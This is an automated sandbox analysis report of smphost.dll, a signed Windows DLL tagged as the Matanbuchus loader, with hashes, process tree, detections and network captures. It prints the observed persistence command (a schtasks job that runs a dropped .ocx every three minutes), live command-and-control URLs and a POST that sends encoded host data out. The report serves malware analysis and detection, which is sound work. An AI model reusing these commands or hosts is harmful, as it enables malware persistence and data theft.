Edit tour

Windows Analysis Report
smphost.dll

Overview

General Information

Sample Name:	smphost.dll
Analysis ID:	562835
MD5:	fc484855692f2a7d1eae090086a1eb72
SHA1:	2e9103747750b40835f58d9e57c2ab75eeaf25f6
SHA256:	e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e
Tags:	dllmatanbuchusSATURNCONSULTANCYLTDsigned
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Uses known network protocols on non-standard ports

Sigma detected: Regsvr32 Network Activity

Sigma detected: Suspicious Call by Ordinal

Uses schtasks.exe or at.exe to add and modify task schedules

Uses 32bit PE files

Drops PE files to the application program directory (C:\ProgramData)

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Registers a DLL

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4536 cmdline: loaddll32.exe "C:\Users\user\Desktop\smphost.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 4540 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4612 cmdline: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 6260 cmdline: regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

schtasks.exe (PID: 5552 cmdline: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx MD5: 15FF7D8324231381BAD48A052F85DF04)

WerFault.exe (PID: 4424 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 4348 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5100 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3940 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 4360 cmdline: C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 5264 cmdline: -e C:\ProgramData\6\5507.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)

cleanup

Sigma Overview

System Summary

Sigma detected: Regsvr32 Network Activity

Source: DNS query

Author: Dmitriy Lifanov, oscd.community: Data: Image: C:\Windows\SysWOW64\regsvr32.exe, QueryName: manageintel.com

Sigma detected: Suspicious Call by Ordinal

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4540, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, ProcessId: 4612

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, CommandLine: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 6260, ProcessCommandLine: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, ProcessId: 5552

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: smphost.dll

Virustotal: Detection: 8%

Perma Link

Antivirus detection for URL or domain

Source: http://manageintel.com/WUzZRUBQje/Auth.php

Avira URL Cloud: Label: malware

Source: smphost.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE

Source: unknown	HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49837 version: TLS 1.2

Source: smphost.dll

Static PE information: certificate valid

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EED8A FindFirstFileExW,		0_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CED8A FindFirstFileExW,		25_2_6F6CED8A

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: the.earth.li
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 185.14.31.158 32710	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 93.93.131.124 187	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: manageintel.com

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49840

Source: Joe Sandbox View

ASN Name: ITLDC-NLUA ITLDC-NLUA

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cacheConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 93.93.131.124 93.93.131.124

Source: global traffic

TCP traffic: 192.168.2.3:49835 -> 185.14.31.158:32710

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833

Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp, regsvr32.exe	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp, regsvr32.exe	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml

Source: unknown

HTTP traffic detected: POST /WUzZRUBQje/Auth.php HTTP/1.1User-Agent: Windows-AzureAD-Authentication-Provider/11.0Host: manageintel.comContent-Length: 549Content-Type: application/x-www-form-urlencodedAccept-Language: en-USData Raw: 61 75 74 68 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 56 33 4a 47 65 44 6c 68 55 45 73 31 64 30 35 6a 54 31 56 57 52 6b 78 47 55 32 74 6d 51 6c 6c 4c 4d 30 78 6a 59 56 4e 6c 5a 31 4e 45 53 6b 70 50 56 7a 52 35 56 31 45 33 4d 30 77 79 52 6e 64 71 4b 32 34 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 53 79 73 30 4f 47 39 52 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 56 58 4a 30 62 79 74 68 52 54 30 69 4c 43 49 31 5a 47 56 69 4f 57 4d 69 4f 69 4a 4a 64 54 41 35 63 43 39 79 56 69 49 73 49 6b 52 54 4d 6e 67 69 4f 69 4a 4b 5a 58 4e 73 4d 48 46 68 56 79 49 73 49 6b 56 4d 61 69 49 36 49 6c 56 78 62 47 63 77 63 58 46 50 4d 30 56 7a 55 53 49 73 49 6b 56 76 4e 69 49 36 49 6c 68 79 4e 58 67 34 59 55 55 39 49 69 77 69 52 6e 52 76 49 6a 6f 69 53 6e 63 39 50 53 49 73 49 6c 45 32 57 44 59 69 4f 69 4a 57 57 6e 42 4d 4d 6c 70 74 63 53 74 6e 50 54 30 69 4c 43 4a 55 51 55 31 6d 62 53 49 36 57 79 4a 58 53 58 52 36 4b 7a 55 72 61 7a 56 57 61 79 74 4c 64 7a 30 39 49 6c 30 73 49 6d 4e 43 52 69 49 36 49 6c 5a 77 64 32 38 78 64 6e 5a 51 4f 54 4a 6f 55 6c 46 6f 64 32 46 6c 65 6d 70 6b 5a 45 68 7a 50 53 49 73 49 6d 55 77 4d 32 56 6b 49 6a 6f 69 56 55 39 57 57 6e 67 32 59 55 30 77 56 56 56 4d 51 31 68 61 61 30 31 42 4b 32 35 6d 62 57 64 50 65 55 74 6e 4e 47 56 68 4f 56 68 55 54 6b 4a 4f 55 32 56 4d 56 45 4e 6d 57 54 30 69 4c 43 4a 6d 4d 57 52 68 49 6a 6f 69 56 44 52 4f 51 6a 46 61 65 58 41 30 56 31 56 7a 56 6e 67 77 52 32 5a 35 61 6b 68 43 5a 7a 51 39 49 69 77 69 64 31 41 32 49 6a 6f 69 57 6d 55 30 63 6d 38 72 53 46 49 69 4c 43 4a 33 5a 32 70 32 49 6a 6f 69 57 6b 78 6f 64 6a 56 6e 50 54 30 69 4c 43 4a 36 61 30 4d 33 49 6a 6f 69 49 6e 30 3d Data Ascii: auth=eyIzQ0VrIjoiV3JGeDlhUEs1d05jT1VWRkxGU2tmQllLM0xjYVNlZ1NESkpPVzR5V1E3M0wyRndqK24wPSIsIjNmZTExIjoiSys0OG9RPT0iLCIzbTd4IjoiVXJ0bythRT0iLCI1ZGViOWMiOiJJdTA5cC9yViIsIkRTMngiOiJKZXNsMHFhVyIsIkVMaiI6IlVxbGcwcXFPM0VzUSIsIkVvNiI6IlhyNXg4YUU9IiwiRnRvIjoiSnc9PSIsIlE2WDYiOiJWWnBMMlptcStnPT0iLCJUQU1mbSI6WyJXSXR6KzUrazVWaytLdz09Il0sImNCRiI6IlZwd28xdnZQOTJoUlFod2FlempkZEhzPSIsImUwM2VkIjoiVU9WWng2YU0wVVVMQ1haa01BK25mbWdPeUtnNGVhOVhUTkJOU2VMVENmWT0iLCJmMWRhIjoiVDROQjFaeXA0V1VzVngwR2Z5akhCZzQ9Iiwid1A2IjoiWmU0cm8rSFIiLCJ3Z2p2IjoiWkxodjVnPT0iLCJ6a0M3IjoiIn0=

Source: unknown

DNS traffic detected: queries for: manageintel.com

Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cacheConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache

Source: unknown	HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49837 version: TLS 1.2

System Summary

Source: smphost.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9F3EB6	0_2_6E9F3EB6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E8C90	0_2_6E9E8C90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6D3EB6	25_2_6F6D3EB6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C8C90	25_2_6F6C8C90

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E9E9960 appears 34 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 6F6C9960 appears 34 times

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\ProgramData\6\5507.ocx E58B9BBB7BCDF3E901453B7B9C9E514FED1E53565E3280353DCCC77CDE26A98E

Source: smphost.dll

Virustotal: Detection: 8%

Source: smphost.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\smphost.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB43.tmp

Jump to behavior

Source: classification engine

Classification label: mal88.troj.evad.winDLL@19/7@5/2

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon,

0_2_6E9E8630

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6260
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\computer

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: smphost.dll

Static PE information: certificate valid

Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: smphost.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\ProgramData\6\5507.ocx

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\ProgramData\6\5507.ocx

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49840

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008	Thread sleep time: -54000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	API coverage: 6.8 %
Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 6.3 %

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EED8A FindFirstFileExW,		0_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CED8A FindFirstFileExW,		25_2_6F6CED8A

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: regsvr32.exe, 00000003.00000003.524171226.0000000005247000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.523620825.0000000005151000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.518162902.0000000005151000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.511554101.0000000005051000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 7qAJTueJV05Xwegg6bMAAApTi10HgfsAbFhzMiq3oTtaEegJyQAAWY/AdTfkf4tG
Source: regsvr32.exe, 00000003.00000003.524171226.0000000005247000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.523620825.0000000005151000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bVf2XmkyVwC+WwEAAI1F4FpWU1dl//91iQ4iqeMuV07UhiCL+IN94AoPhboPAACF

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9E9CF7 IsDebuggerPresent,OutputDebugStringW,

0_2_6E9E9CF7

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9EFE17 GetProcessHeap,

0_2_6E9EFE17

